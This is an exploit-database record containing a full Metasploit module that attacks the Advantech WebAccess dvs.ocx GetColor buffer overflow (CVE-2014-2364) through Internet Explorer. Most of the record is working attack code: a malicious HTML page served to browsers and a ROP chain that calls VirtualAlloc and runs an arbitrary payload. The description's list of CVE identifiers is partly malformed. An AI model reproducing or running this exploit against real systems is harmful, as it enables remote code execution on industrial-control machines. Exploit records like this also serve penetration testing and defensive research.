ID

VAR-E-201407-0126

CVE

EDB ID

34757

TITLE

Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit) - Windows remote Exploit

DESCRIPTION

Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit). CVE-2014-2364CVE-109329CVE-109328CVE-109327CVE-109326CVE-109325CVE-109324CVE-109323CVE-109322CVE-109321CVE-109320CVE-109319CVE-109315 . remote exploit for Windows platform

AFFECTED PRODUCTS

EXPLOIT

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
sprintf can be reached with user controlled data through the GetColor function.
This module has been tested successfully on Windows XP SP3 with IE6 and Windows
7 SP1 with IE8 and IE 9.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2364'],
['ZDI', '14-255'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
],
'DefaultOptions' =>
{
'Retries' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => /MSIE/i,
:ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
:clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
:method => "GetColor"
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x5c",
# Patch the stack to execute the decoder...
'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
# Fix the stack again, this time better :), before the payload
# is executed.
'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 17 2014'))
end

def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")

content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
EOS

print_status("Sending #{self.name}")
send_response_html(cli, content, {'Pragma' => 'no-cache'})
end

# Uses gadgets from ijl11.dll 1.1.2.16
def rop_payload(code)
xpl = rand_text_alphanumeric(61) # offset
xpl << [0x60014185].pack("V") # RET
xpl << rand_text_alphanumeric(8)

# EBX = dwSize (0x40)
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << [0x9ffdafc9].pack("V") # eax value
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
xpl << [0x60018084].pack("V") # POP EBP # RETN
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
# EDX = flAllocationType (0x1000)
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << [0x9ffdbf89].pack("V") # eax value
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
# ECX = flProtect (0x40)
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
0x41.times do
xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
end
# EAX = ptr to &VirtualAlloc()
xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
# EBP = POP (skip 4 bytes)
xpl << [0x6002054b].pack("V") # POP EBP # RETN
xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
# ESI = ptr to JMP [EAX]
xpl << [0x600181cc].pack("V") # POP ESI # RETN
xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
# EDI = ROP NOP (RETN)
xpl << [0x60021ad1].pack("V") # POP EDI # RETN
xpl << [0x60021ad2].pack("V") # ptr to &(retn)
# ESP = lpAddress (automatic)
# PUSHAD # RETN
xpl << [0x60018399].pack("V") # PUSHAD # RETN
xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
xpl << code

xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping

xpl
end

end

EXPLOIT LANGUAGE

rb

PRICE

free

TYPE

dvs.ocx GetColor Buffer Overflow (Metasploit)

TAGS

CREDITS

Metasploit

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:24:41.001000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE